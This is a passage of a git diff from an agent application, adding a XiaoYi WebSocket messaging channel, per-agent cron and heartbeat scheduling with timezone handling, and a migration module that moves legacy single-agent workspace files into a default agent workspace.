chunks of TEXT_CHUNK_LIMIT size.""" + if len(text) <= TEXT_CHUNK_LIMIT: + return [text] + + chunks = [] + # Try to split at newlines for better readability + lines = text.split("\n") + current_chunk = "" + + for line in lines: + # If single line is too long, split it + if len(line) > TEXT_CHUNK_LIMIT: + # First add any accumulated chunk + if current_chunk: + chunks.append(current_chunk.rstrip("\n")) + current_chunk = "" + + # Split long line into chunks + for i in range(0, len(line), TEXT_CHUNK_LIMIT): + chunks.append(line[i : i + TEXT_CHUNK_LIMIT]) + else: + # Check if adding this line would exceed limit + test_chunk = ( + current_chunk + "\n" + line if current_chunk else line + ) + if len(test_chunk) > TEXT_CHUNK_LIMIT: + if current_chunk: + chunks.append(current_chunk) + current_chunk = line + else: + current_chunk = test_chunk + + if current_chunk: + chunks.append(current_chunk) + + return chunks + + async def _send_chunk( + self, + session_id: str, + task_id: str, + message_id: str, + text: str, + ) -> None: + """Send a single text chunk via WebSocket.""" + if not self._ws or not self._connected: + logger.warning("XiaoYi: Cannot send chunk - not connected") + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, # Append to previous messages + "lastChunk": False, # Not the last chunk + "final": False, # Not final, more content may come + "artifact": { + "artifactId": artifact_id, + "parts": [{"kind": "text", "text": text}], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send message: {e}") + + async def _send_reasoning_chunk( + self, + session_id: str, + task_id: str, + message_id: str, + reasoning_text: str, + ) -> None: + """Send a single reasoning/thinking chunk via WebSocket.""" + if not self._ws or not self._connected: + logger.warning( + "XiaoYi: Cannot send reasoning chunk - not connected", + ) + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": False, + "final": False, + "artifact": { + "artifactId": artifact_id, + "parts": [ + { + "kind": "reasoningText", + "reasoningText": reasoning_text, + }, + ], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send reasoning chunk: {e}") + + async def send_final_message( + self, + session_id: str, + task_id: str, + message_id: str, + ) -> None: + """Send final empty message to end the stream.""" + if not self.enabled or not self._ws or not self._connected: + return + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": True, + "final": True, + "artifact": { + "artifactId": artifact_id, + "parts": [ + {"kind": "text", "text": ""}, + ], # Empty text for final + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send final message: {e}") + + async def send_media( + self, + to_handle: str, + part: OutgoingContentPart, + meta: Optional[Dict[str, Any]] = None, + ) -> None: + """Send media message via WebSocket.""" + if not self.enabled or not self._ws or not self._connected: + return + + meta = meta or {} + session_id = meta.get("session_id") or to_handle + task_id = meta.get("task_id") or self._session_task_map.get(session_id) + + if not task_id: + return + + part_type = getattr(part, "type", None) + + # Build artifact part based on content type + artifact_part: Dict[str, Any] = {"kind": "text"} + + if part_type == ContentType.IMAGE: + img_url = getattr(part, "image_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": "image", + "mimeType": "image/png", + "uri": img_url, + }, + } + elif part_type == ContentType.VIDEO: + vid_url = getattr(part, "video_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": "video", + "mimeType": "video/mp4", + "uri": vid_url, + }, + } + elif part_type == ContentType.FILE: + file_url = getattr(part, "file_url", "") + artifact_part = { + "kind": "file", + "file": { + "name": getattr(part, "file_name", "file"), + "mimeType": "application/octet-stream", + "uri": file_url, + }, + } + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": str(uuid.uuid4()), + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": True, + "final": True, + "artifact": { + "artifactId": artifact_id, + "parts": [artifact_part], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send media: {e}") + + def _extract_xiaoyi_parts( + self, + message: Any, + ) -> List[Dict[str, Any]]: + # pylint: disable=too-many-branches,too-many-statements + # pylint: disable=too-many-nested-blocks + """Extract parts from message with proper XiaoYi kinds. + + XiaoYi supports: + - kind="reasoningText": For thinking/reasoning content + - kind="text": For regular text content + """ + from agentscope_runtime.engine.schemas.agent_schemas import ( + MessageType, + ) + + msg_type = getattr(message, "type", None) + content = getattr(message, "content", None) or [] + parts = [] + + # Check if this is a reasoning/thinking message type + if msg_type == MessageType.REASONING: + # Check if thinking is filtered + if self._render_style.filter_thinking: + return [] + for c in content: + text = getattr(c, "text", None) + if text: + # Add newline separator for each thinking content + parts.append( + { + "kind": "reasoningText", + "reasoningText": text + "\n", + }, + ) + return parts + + # Process each content item + for c in content: + ctype = getattr(c, "type", None) + + # Handle thinking blocks (inside DATA content as dict) + if ctype == ContentType.DATA: + data = getattr(c, "data", None) + if isinstance(data, dict): + # Check for thinking content in blocks + blocks = data.get("blocks", []) + if ( + isinstance(blocks, list) + and not self._render_style.filter_thinking + ): + for block in blocks: + if ( + isinstance(block, dict) + and block.get("type") == "thinking" + ): + thinking_text = block.get("thinking", "") + if thinking_text: + # Add newline separator + parts.append( + { + "kind": "reasoningText", + "reasoningText": thinking_text + + "\n", + }, + ) + + # Handle TEXT type (regular message content) + # Add leading newline to separate from previous content + if ctype == ContentType.TEXT and getattr(c, "text", None): + text = c.text + # Add leading newlines if not already present + if not text.startswith("\n"): + text = "\n\n" + text + parts.append({"kind": "text", "text": text}) + + # Handle REFUSAL type + elif ctype == ContentType.REFUSAL and getattr(c, "refusal", None): + parts.append({"kind": "text", "text": c.refusal}) + + # Handle tool call/output messages + # with complete, independent formatting + # Check if tool messages should be filtered + if self._render_style.filter_tool_messages: + if msg_type in ( + MessageType.FUNCTION_CALL, + MessageType.PLUGIN_CALL, + MessageType.MCP_TOOL_CALL, + MessageType.FUNCTION_CALL_OUTPUT, + MessageType.PLUGIN_CALL_OUTPUT, + MessageType.MCP_TOOL_CALL_OUTPUT, + ): + return [] + + if msg_type in ( + MessageType.FUNCTION_CALL, + MessageType.PLUGIN_CALL, + MessageType.MCP_TOOL_CALL, + ): + # Tool call: format as "🔧 **name**" + code block with args + for c in content: + if getattr(c, "type", None) != ContentType.DATA: + continue + data = getattr(c, "data", None) + if not isinstance(data, dict): + continue + name = data.get("name") or "tool" + args = data.get("arguments") or "{}" + # Complete, independent formatting for each tool call + formatted = f"\n\n🔧 **{name}**\n```\n{args}\n```\n" + parts.append({"kind": "text", "text": formatted}) + return parts + + if msg_type in ( + MessageType.FUNCTION_CALL_OUTPUT, + MessageType.PLUGIN_CALL_OUTPUT, + MessageType.MCP_TOOL_CALL_OUTPUT, + ): + # Tool output: format as "✅ **name**" + code block with result + for c in content: + if getattr(c, "type", None) != ContentType.DATA: + continue + data = getattr(c, "data", None) + if not isinstance(data, dict): + continue + name = data.get("name") or "tool" + output = data.get("output", "") + + # Parse output and format as JSON + try: + if isinstance(output, str): + parsed = json.loads(output) + else: + parsed = output + + # Handle list format like [{'type': 'text', 'text': '...'}] + if isinstance(parsed, list): + texts = [] + for item in parsed: + if ( + isinstance(item, dict) + and item.get("type") == "text" + ): + texts.append(item.get("text", "")) + output_str = "\n".join(texts) if texts else str(parsed) + elif isinstance(parsed, dict): + output_str = json.dumps( + parsed, + ensure_ascii=False, + indent=2, + ) + else: + output_str = str(parsed) + except (json.JSONDecodeError, TypeError): + output_str = str(output) if output else "" + + # Truncate if too long + if len(output_str) > 500: + output_str = output_str[:500] + "..." + + # Escape backticks in output + # to avoid breaking code blocks + output_str = output_str.replace("```", "\\`\\`\\`") + + # Complete, independent formatting + # for each tool output + # Ensure code block is properly closed + formatted = f"\n\n✅ **{name}**\n```\n{output_str}\n```\n" + parts.append({"kind": "text", "text": formatted}) + return parts + + # If no parts extracted, use renderer as fallback + if not parts: + rendered_parts = self._renderer.message_to_parts(message) + for rp in rendered_parts: + if getattr(rp, "type", None) == ContentType.TEXT: + text = getattr(rp, "text", "") + if text: + parts.append({"kind": "text", "text": text}) + + return parts + + async def send_xiaoyi_parts( + self, + to_handle: str, + parts: List[Dict[str, Any]], + meta: Optional[Dict[str, Any]] = None, + ) -> None: + # pylint: disable=too-many-branches,too-many-nested-blocks + """Send parts with XiaoYi-specific format. + + Each part is a dict with: + - kind: "text" or "reasoningText" + - text/reasoningText: the content string + """ + if not self.enabled or not self._ws or not self._connected: + logger.warning("XiaoYi: Cannot send - not connected") + return + + meta = meta or {} + session_id = meta.get("session_id") or to_handle + task_id = meta.get("task_id") or self._session_task_map.get(session_id) + + if not task_id: + logger.warning(f"XiaoYi: No task_id for session {session_id}") + return + + message_id = meta.get("message_id", str(uuid.uuid4())) + + # Build artifact parts for XiaoYi + artifact_parts = [] + for part in parts: + kind = part.get("kind", "text") + if kind == "reasoningText": + artifact_parts.append( + { + "kind": "reasoningText", + "reasoningText": part.get("reasoningText", ""), + }, + ) + elif kind == "text": + artifact_parts.append( + { + "kind": "text", + "text": part.get("text", ""), + }, + ) + + if not artifact_parts: + return + + # Check if any part exceeds chunk limit + max_part_len = max( + len(p.get("text", "") or p.get("reasoningText", "")) + for p in artifact_parts + ) + + if max_part_len > TEXT_CHUNK_LIMIT: + # Chunk each part separately, preserving kind + for part in artifact_parts: + kind = part.get("kind", "text") + content = part.get("text", "") or part.get("reasoningText", "") + if len(content) > TEXT_CHUNK_LIMIT: + chunks = self._chunk_text(content) + for chunk in chunks: + if kind == "reasoningText": + await self._send_reasoning_chunk( + session_id, + task_id, + message_id, + chunk, + ) + else: + await self._send_chunk( + session_id, + task_id, + message_id, + chunk, + ) + else: + # Send small parts as-is + if kind == "reasoningText": + await self._send_reasoning_chunk( + session_id, + task_id, + message_id, + content, + ) + else: + await self._send_chunk( + session_id, + task_id, + message_id, + content, + ) + return + + # Send as single message with proper parts + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": message_id, + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": False, + "final": False, + "artifact": { + "artifactId": artifact_id, + "parts": artifact_parts, + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send parts: {e}") + + async def on_event_message_completed( + self, + request: "AgentRequest", + to_handle: str, + event: Any, + send_meta: Dict[str, Any], + ) -> None: + """Override to handle XiaoYi-specific message formatting. + + Separates thinking/reasoning content from regular text. + """ + # Extract parts with proper kinds + parts = self._extract_xiaoyi_parts(event) + + if not parts: + logger.debug("XiaoYi: No parts to send for message") + return + + # Send with XiaoYi format + await self.send_xiaoyi_parts(to_handle, parts, send_meta) + + def resolve_session_id( + self, + sender_id: str, + channel_meta: Optional[Dict[str, Any]] = None, + ) -> str: + """Resolve session ID from sender and meta.""" + if channel_meta and channel_meta.get("session_id"): + return f"xiaoyi:{channel_meta['session_id']}" + return f"xiaoyi:{sender_id}" + + def get_to_handle_from_request(self, request: "AgentRequest") -> str: + """Get send target from request.""" + meta = getattr(request, "channel_meta", None) or {} + if meta.get("session_id"): + return meta["session_id"] + return getattr(request, "user_id", "") or "" + + def build_agent_request_from_native( + self, + native_payload: Any, + ) -> "AgentRequest": + """Build AgentRequest from native payload.""" + payload = native_payload if isinstance(native_payload, dict) else {} + + channel_id = payload.get("channel_id") or self.channel + sender_id = payload.get("sender_id") or "" + content_parts = payload.get("content_parts") or [] + meta = payload.get("meta") or {} + + session_id = self.resolve_session_id(sender_id, meta) + + request = self.build_agent_request_from_user_content( + channel_id=channel_id, + sender_id=sender_id, + session_id=session_id, + content_parts=content_parts, + channel_meta=meta, + ) + request.user_id = sender_id + request.channel_meta = meta + return request + + def to_handle_from_target(self, *, user_id: str, session_id: str) -> str: + """Map dispatch target to channel-specific to_handle.""" + if session_id.startswith("xiaoyi:"): + return session_id.split(":", 1)[-1] + return user_id + + async def _run_process_loop( + self, + request: "AgentRequest", + to_handle: str, + send_meta: Dict[str, Any], + ) -> None: + """Run process and send events. Override to send final message.""" + from agentscope_runtime.engine.schemas.agent_schemas import RunStatus + + last_response = None + session_id = send_meta.get("session_id") or to_handle + + try: + async for event in self._process(request): + obj = getattr(event, "object", None) + status = getattr(event, "status", None) + if obj == "message" and status == RunStatus.Completed: + await self.on_event_message_completed( + request, + to_handle, + event, + send_meta, + ) + elif obj == "response": + last_response = event + await self.on_event_response(request, event) + + # Send final message to end the stream + task_id = send_meta.get("task_id") or self._session_task_map.get( + session_id, + ) + message_id = str(uuid.uuid4()) + + if task_id and session_id: + await self.send_final_message(session_id, task_id, message_id) + + err_msg = self._get_response_error_message(last_response) + if err_msg: + await self._on_consume_error( + request, + to_handle, + f"Error: {err_msg}", + ) + if self._on_reply_sent: + args = self.get_on_reply_sent_args(request, to_handle) + self._on_reply_sent(self.channel, *args) + except Exception: + logger.exception("XiaoYi channel consume_one failed") + await self._on_consume_error( + request, + to_handle, + "An error occurred while processing your request.", + ) diff --git a/src/copaw/app/channels/xiaoyi/constants.py b/src/copaw/app/channels/xiaoyi/constants.py new file mode 100644 index 000000000..3f6649a8d --- /dev/null +++ b/src/copaw/app/channels/xiaoyi/constants.py @@ -0,0 +1,22 @@ +# -*- coding: utf-8 -*- +"""XiaoYi channel constants.""" + +# Default WebSocket URL +DEFAULT_WS_URL = "wss://hag.cloud.huawei.com/openclaw/v1/ws/link" + +# Heartbeat interval (seconds) +HEARTBEAT_INTERVAL = 30 + +# Reconnect delays (seconds) +RECONNECT_DELAYS = [1, 2, 5, 10, 30, 60] +MAX_RECONNECT_ATTEMPTS = 50 + +# Connection timeout (seconds) +CONNECTION_TIMEOUT = 30 + +# Task timeout (milliseconds) +DEFAULT_TASK_TIMEOUT_MS = 3600000 # 1 hour + +# Maximum text chunk size (characters) +# Larger messages will be split to avoid WebSocket disconnection +TEXT_CHUNK_LIMIT = 4000 diff --git a/src/copaw/app/crons/api.py b/src/copaw/app/crons/api.py index a52b44399..21ca65138 100644 --- a/src/copaw/app/crons/api.py +++ b/src/copaw/app/crons/api.py @@ -10,14 +10,19 @@ router = APIRouter(prefix="/cron", tags=["cron"]) -def get_cron_manager(request: Request) -> CronManager: - mgr = getattr(request.app.state, "cron_manager", None) - if mgr is None: +async def get_cron_manager( + request: Request, +) -> CronManager: + """Get cron manager for the active agent.""" + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + if workspace.cron_manager is None: raise HTTPException( - status_code=503, - detail="cron manager not initialized", + status_code=500, + detail="CronManager not initialized", ) - return mgr + return workspace.cron_manager @router.get("/jobs", response_model=list[CronJobSpec]) diff --git a/src/copaw/app/crons/heartbeat.py b/src/copaw/app/crons/heartbeat.py index 7b165db37..c6c284614 100644 --- a/src/copaw/app/crons/heartbeat.py +++ b/src/copaw/app/crons/heartbeat.py @@ -9,15 +9,17 @@ import asyncio import logging import re -from datetime import datetime, time -from typing import Any, Dict +from datetime import datetime, time, timezone +from pathlib import Path +from zoneinfo import ZoneInfo, ZoneInfoNotFoundError +from typing import Any, Dict, Optional from ...config import ( get_heartbeat_config, get_heartbeat_query_path, load_config, ) -from ...constant import HEARTBEAT_TARGET_LAST +from ...constant import HEARTBEAT_FILE, HEARTBEAT_TARGET_LAST logger = logging.getLogger(__name__) @@ -26,8 +28,6 @@ r"^(?:(?P\d+)h)?(?:(?P\d+)m)?(?:(?P\d+)s)?$", re.IGNORECASE, ) - - def parse_heartbeat_every(every: str) -> int: """Parse interval string (e.g. '30m', '1h') to total seconds.""" every = (every or "").strip() @@ -47,7 +47,9 @@ def parse_heartbeat_every(every: str) -> int: def _in_active_hours(active_hours: Any) -> bool: - """Return True if current local time is within [start, end].""" + """Return True if the current time in user timezone is within + [start, end]. + """ if ( not active_hours or not hasattr(active_hours, "start") @@ -67,7 +69,16 @@ def _in_active_hours(active_hours: Any) -> bool: ) except (ValueError, IndexError, AttributeError): return True - now = datetime.now().time() + user_tz = load_config().user_timezone or "UTC" + try: + now = datetime.now(ZoneInfo(user_tz)).time() + except (ZoneInfoNotFoundError, KeyError): + logger.warning( + "Invalid timezone %r in config, falling back to UTC" + " for heartbeat active hours check.", + user_tz, + ) + now = datetime.now(timezone.utc).time() if start_t <= end_t: return start_t <= now <= end_t return now >= start_t or now <= end_t @@ -77,18 +88,32 @@ async def run_heartbeat_once( *, runner: Any, channel_manager: Any, + agent_id: Optional[str] = None, + workspace_dir: Optional[Path] = None, ) -> None: """ - Run one heartbeat: read HEARTBEAT.md via config path, run agent, + Run one heartbeat: read HEARTBEAT.md from workspace, run agent, optionally dispatch to last channel (target=last). + + Args: + runner: Agent runner instance + channel_manager: Channel manager instance + agent_id: Agent ID for loading config + workspace_dir: Workspace directory for reading HEARTBEAT.md """ - config = load_config() - hb = get_heartbeat_config() + from ...config.config import load_agent_config + + hb = get_heartbeat_config(agent_id) if not _in_active_hours(hb.active_hours): logger.debug("heartbeat skipped: outside active hours") return - path = get_heartbeat_query_path() + # Use workspace_dir if provided, otherwise fall back to global path + if workspace_dir: + path = Path(workspace_dir) / HEARTBEAT_FILE + else: + path = get_heartbeat_query_path() + if not path.is_file(): logger.debug("heartbeat skipped: no file at %s", path) return @@ -110,7 +135,21 @@ async def run_heartbeat_once( "user_id": "main", } + # Get last_dispatch from agent config if agent_id provided + last_dispatch = None + if agent_id: + try: + agent_config = load_agent_config(agent_id) + last_dispatch = agent_config.last_dispatch + except Exception: + pass + else: + # Legacy: try root config + config = load_config() + last_dispatch = config.last_dispatch + target = (hb.target or "").strip().lower() + heartbeat_ran = False if target == HEARTBEAT_TARGET_LAST and config.last_dispatch: ld = config.last_dispatch if ld.channel and (ld.user_id or ld.session_id): @@ -127,16 +166,18 @@ async def _run_and_dispatch() -> None: try: await asyncio.wait_for(_run_and_dispatch(), timeout=120) + heartbeat_ran = True except asyncio.TimeoutError: logger.warning("heartbeat run timed out") - return + heartbeat_ran = True # target main or no last_dispatch: run agent only, no dispatch - async def _run_only() -> None: - async for _ in runner.stream_query(req): - pass - - try: - await asyncio.wait_for(_run_only(), timeout=120) - except asyncio.TimeoutError: - logger.warning("heartbeat run timed out") + if not heartbeat_ran: + async def _run_only() -> None: + async for _ in runner.stream_query(req): + pass + + try: + await asyncio.wait_for(_run_only(), timeout=120) + except asyncio.TimeoutError: + logger.warning("heartbeat run timed out") diff --git a/src/copaw/app/crons/manager.py b/src/copaw/app/crons/manager.py index 5be0930fe..93b80a0f7 100644 --- a/src/copaw/app/crons/manager.py +++ b/src/copaw/app/crons/manager.py @@ -4,7 +4,7 @@ import asyncio import logging from dataclasses import dataclass -from datetime import datetime +from datetime import datetime, timezone from typing import Any, Dict, Optional from apscheduler.schedulers.asyncio import AsyncIOScheduler @@ -36,11 +36,13 @@ def __init__( repo: BaseJobRepository, runner: Any, channel_manager: Any, - timezone: str = "UTC", + timezone: str = "UTC", # pylint: disable=redefined-outer-name + agent_id: Optional[str] = None, ): self._repo = repo self._runner = runner self._channel_manager = channel_manager + self._agent_id = agent_id self._scheduler = AsyncIOScheduler(timezone=timezone) self._executor = CronExecutor( runner=runner, @@ -60,11 +62,23 @@ async def start(self) -> None: self._scheduler.start() for job in jobs_file.jobs: - await self._register_or_update(job) + try: + await self._register_or_update(job) + except Exception as exc: # pylint: disable=broad-except + logger.exception( + "cron startup skipped invalid job: id=%s name=%s cron=%s", + job.id, + job.name, + job.schedule.cron, + ) + self._states[job.id] = CronJobState( + last_status="error", + last_error=str(exc), + ) # Heartbeat: one interval job when enabled in config - hb = get_heartbeat_config() - if getattr(hb, "enabled", True): + hb = get_heartbeat_config(self._agent_id) + if getattr(hb, "enabled", False): interval_seconds = parse_heartbeat_every(hb.every) self._scheduler.add_job( self._heartbeat_callback, @@ -72,6 +86,10 @@ async def start(self) -> None: id=HEARTBEAT_JOB_ID, replace_existing=True, ) + logger.info( + f"Heartbeat job scheduled for agent {self._agent_id}: " + f"every={hb.every} (interval={interval_seconds}s)", + ) self._started = True @@ -118,14 +136,27 @@ async def resume_job(self, job_id: str) -> None: self._scheduler.resume_job(job_id) async def reschedule_heartbeat(self) -> None: - """Reload heartbeat config and update or remove the heartbeat job.""" + """Reload heartbeat config and update or remove the heartbeat job. + + Note: CronManager should always be started during workspace + initialization, so this method assumes self._started is True. + """ async with self._lock: if not self._started: + logger.warning( + f"CronManager not started for agent {self._agent_id}, " + f"cannot reschedule heartbeat. This should not happen.", + ) return - hb = get_heartbeat_config() + + hb = get_heartbeat_config(self._agent_id) + + # Remove existing heartbeat job if present if self._scheduler.get_job(HEARTBEAT_JOB_ID): self._scheduler.remove_job(HEARTBEAT_JOB_ID) - if getattr(hb, "enabled", True): + + # Add heartbeat job if enabled + if getattr(hb, "enabled", False): interval_seconds = parse_heartbeat_every(hb.every) self._scheduler.add_job( self._heartbeat_callback, @@ -258,9 +289,16 @@ async def _scheduled_callback(self, job_id: str) -> None: async def _heartbeat_callback(self) -> None: """Run one heartbeat (HEARTBEAT.md as query, optional dispatch).""" try: + # Get workspace_dir from runner if available + workspace_dir = None + if hasattr(self._runner, "workspace_dir"): + workspace_dir = self._runner.workspace_dir + await run_heartbeat_once( runner=self._runner, channel_manager=self._channel_manager, + agent_id=self._agent_id, + workspace_dir=workspace_dir, ) except Exception: # pylint: disable=broad-except logger.exception("heartbeat run failed") @@ -294,5 +332,5 @@ async def _execute_once(self, job: CronJobSpec) -> None: ) raise finally: - st.last_run_at = datetime.utcnow() + st.last_run_at = datetime.now(timezone.utc) self._states[job.id] = st diff --git a/src/copaw/app/crons/models.py b/src/copaw/app/crons/models.py index f207e18dd..bf0169b11 100644 --- a/src/copaw/app/crons/models.py +++ b/src/copaw/app/crons/models.py @@ -44,6 +44,9 @@ def _crontab_dow_to_name(field: str) -> str: return field def _convert_token(tok: str) -> str: + if "/" in tok: + base, step = tok.rsplit("/", 1) + return f"{_convert_token(base)}/{step}" if "-" in tok: parts = tok.split("-", 1) return "-".join(_CRONTAB_NUM_TO_NAME.get(p, p) for p in parts) diff --git a/src/copaw/app/crons/repo/json_repo.py b/src/copaw/app/crons/repo/json_repo.py index fc1c47025..ecc40de11 100644 --- a/src/copaw/app/crons/repo/json_repo.py +++ b/src/copaw/app/crons/repo/json_repo.py @@ -17,7 +17,9 @@ class JsonJobRepository(BaseJobRepository): - Atomic write: write tmp then replace. """ - def __init__(self, path: Path): + def __init__(self, path: Path | str): + if isinstance(path, str): + path = Path(path) self._path = path.expanduser() @property diff --git a/src/copaw/app/migration.py b/src/copaw/app/migration.py new file mode 100644 index 000000000..b852c371d --- /dev/null +++ b/src/copaw/app/migration.py @@ -0,0 +1,333 @@ +# -*- coding: utf-8 -*- +"""Configuration migration utilities for multi-agent support. + +Handles migration from legacy single-agent config to new multi-agent structure. +""" +import json +import logging +import shutil +from pathlib import Path + +from ..config.config import ( + AgentProfileConfig, + AgentProfileRef, + AgentsConfig, + AgentsRunningConfig, + AgentsLLMRoutingConfig, +) +from ..constant import WORKING_DIR +from ..config.utils import load_config, save_config + +logger = logging.getLogger(__name__) + +_LEGACY_DEFAULT_WORKING_DIR = Path("~/.copaw").expanduser().resolve() + + +def migrate_legacy_workspace_to_default_agent() -> bool: + """Migrate legacy single-agent workspace to default agent workspace. + + This function: + 1. Checks if migration is needed + 2. Creates default agent workspace + 3. Migrates sessions, memory, and markdown files + 4. Creates agent.json with legacy configuration + 5. Updates root config.json to new structure + + Returns: + bool: True if migration was performed, False if already migrated + """ + try: + config = load_config() + except Exception as e: + logger.error(f"Failed to load config: {e}") + return False + + # Check if already migrated + # Skip if: + # 1. Multiple agents already exist (multi-agent config), OR + # 2. Default agent has agent.json (already migrated) + if len(config.agents.profiles) > 1: + logger.debug( + f"Multi-agent config already exists " + f"({len(config.agents.profiles)} agents), skipping migration", + ) + return False + + if "default" in config.agents.profiles: + agent_ref = config.agents.profiles["default"] + if isinstance(agent_ref, AgentProfileRef): + workspace_dir = Path(agent_ref.workspace_dir).expanduser() + agent_config_path = workspace_dir / "agent.json" + if agent_config_path.exists(): + logger.debug( + "Default agent already migrated, skipping migration", + ) + return False + + logger.info("=" * 60) + logger.info("Migrating legacy config to multi-agent structure...") + logger.info("=" * 60) + + # Extract legacy agent configuration + legacy_agents = config.agents + + # Create default agent workspace + default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser() + default_workspace.mkdir(parents=True, exist_ok=True) + logger.info(f"Created default agent workspace: {default_workspace}") + + # Build default agent configuration from legacy settings + default_agent_config = AgentProfileConfig( + id="default", + name="Default Agent", + description="Default CoPaw agent (migrated from legacy config)", + workspace_dir=str(default_workspace), + channels=config.channels if hasattr(config, "channels") else None, + mcp=config.mcp if hasattr(config, "mcp") else None, + heartbeat=( + legacy_agents.defaults.heartbeat + if hasattr(legacy_agents, "defaults") and legacy_agents.defaults + else None + ), + running=( + legacy_agents.running + if hasattr(legacy_agents, "running") and legacy_agents.running + else AgentsRunningConfig() + ), + llm_routing=( + legacy_agents.llm_routing + if hasattr(legacy_agents, "llm_routing") + and legacy_agents.llm_routing + else AgentsLLMRoutingConfig() + ), + system_prompt_files=( + legacy_agents.system_prompt_files + if hasattr(legacy_agents, "system_prompt_files") + and legacy_agents.system_prompt_files + else ["AGENTS.md", "SOUL.md", "PROFILE.md"] + ), + tools=config.tools if hasattr(config, "tools") else None, + security=config.security if hasattr(config, "security") else None, + ) + + # Save default agent configuration to workspace/agent.json + agent_config_path = default_workspace / "agent.json" + with open(agent_config_path, "w", encoding="utf-8") as f: + json.dump( + default_agent_config.model_dump(exclude_none=True), + f, + ensure_ascii=False, + indent=2, + ) + logger.info(f"Created agent config: {agent_config_path}") + + # Migrate existing workspace files from legacy default working dir. + # When COPAW_WORKING_DIR is customized, historical data may still exist + # under "~/.copaw". + old_workspace = _LEGACY_DEFAULT_WORKING_DIR + + migrated_items = [] + + # Migrate sessions directory + _migrate_workspace_item( + old_workspace / "sessions", + default_workspace / "sessions", + "sessions", + migrated_items, + ) + + # Migrate memory directory + _migrate_workspace_item( + old_workspace / "memory", + default_workspace / "memory", + "memory", + migrated_items, + ) + + # Migrate chats.json + _migrate_workspace_item( + old_workspace / "chats.json", + default_workspace / "chats.json", + "chats.json", + migrated_items, + ) + + # Migrate jobs.json + _migrate_workspace_item( + old_workspace / "jobs.json", + default_workspace / "jobs.json", + "jobs.json", + migrated_items, + ) + + # Migrate markdown files + for md_file in [ + "AGENTS.md", + "SOUL.md", + "PROFILE.md", + "HEARTBEAT.md", + "MEMORY.md", + "BOOTSTRAP.md", + ]: + _migrate_workspace_item( + old_workspace / md_file, + default_workspace / md_file, + md_file, + migrated_items, + ) + + # Migrate channel-specific configuration files + _migrate_workspace_item( + old_workspace / "feishu_receive_ids.json", + default_workspace / "feishu_receive_ids.json", + "feishu_receive_ids.json", + migrated_items, + ) + + _migrate_workspace_item( + old_workspace / "dingtalk_session_webhooks.json", + default_workspace / "dingtalk_session_webhooks.json", + "dingtalk_session_webhooks.json", + migrated_items, + ) + + if migrated_items: + logger.info(f"Migrated workspace items: {', '.join(migrated_items)}") + + # Update root config.json to new structure + # CRITICAL: Preserve legacy agent fields in root config for downgrade + # compatibility. Old versions expect these fields to have valid values. + config.agents = AgentsConfig( + active_agent="default", + profiles={ + "default": AgentProfileRef( + id="default", + workspace_dir=str(default_workspace), + ), + }, + # Preserve legacy fields with values from migrated agent config + running=default_agent_config.running, + llm_routing=default_agent_config.llm_routing, + language=default_agent_config.language, + system_prompt_files=default_agent_config.system_prompt_files, + ) + + # IMPORTANT: Keep original config fields in root config.json for + # backward compatibility. If user downgrades, old version can still + # use these fields. New version will prioritize agent.json. + # DO NOT clear: channels, mcp, tools, security fields + + save_config(config) + logger.info( + "Updated root config.json to multi-agent structure " + "(kept original fields for backward compatibility)", + ) + + logger.info("=" * 60) + logger.info("Migration completed successfully!") + logger.info(f" Default agent workspace: {default_workspace}") + logger.info(f" Default agent config: {agent_config_path}") + logger.info("=" * 60) + + return True + + +def _migrate_workspace_item( + old_path: Path, + new_path: Path, + item_name: str, + migrated_items: list, +) -> None: + """Migrate a single workspace item (file or directory). + + Args: + old_path: Source path + new_path: Destination path + item_name: Name for logging + migrated_items: List to append migrated item names + """ + if not old_path.exists(): + return + + if new_path.exists(): + logger.debug(f"Skipping {item_name} (already exists in new location)") + return + + try: + if old_path.is_dir(): + shutil.copytree(old_path, new_path) + else: + new_path.parent.mkdir(parents=True, exist_ok=True) + shutil.copy2(old_path, new_path) + + migrated_items.append(item_name) + logger.debug(f"Migrated {item_name}") + except Exception as e: + logger.warning(f"Failed to migrate {item_name}: {e}") + + +def ensure_default_agent_exists() -> None: + """Ensure that the default agent exists in config. + + This function is called on 